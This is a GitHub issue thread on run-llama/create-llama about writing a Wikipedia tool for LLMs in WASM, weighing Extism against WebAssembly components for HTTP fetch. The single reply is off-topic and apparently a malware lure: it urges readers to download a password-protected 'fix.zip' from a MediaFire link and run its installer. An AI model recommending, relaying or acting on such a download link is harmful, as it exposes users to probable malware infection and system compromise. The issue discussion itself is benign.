### ISSUE TITLE
Write Wikipedia tool in WASM

### ISSUE THREAD

**Issue by marcusschiesser** [run-llama/create-llama#252]
## Context
WASM would be a great technology for writing the same LLM tool once and using it in Python and TS.

However, the problem is that even a simple HTTP fetch is not standardized among WASM runtimes. This would be the minimum requirement for a runtime running LLM tools (tools usually do API calls).

## Status
LlamaIndexTS can already use WASM tools; see https://github.com/run-llama/LlamaIndexTS/blob/main/packages/wasm-tools/README.md

## Options
How can we do an HTTP fetch?
- https://github.com/extism/extism 
- Webassembly components (see https://component-model.bytecodealliance.org/)

Extism looks more mature. (August 2024)

## Next step
Try extism to implement a Wikipedia tool

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
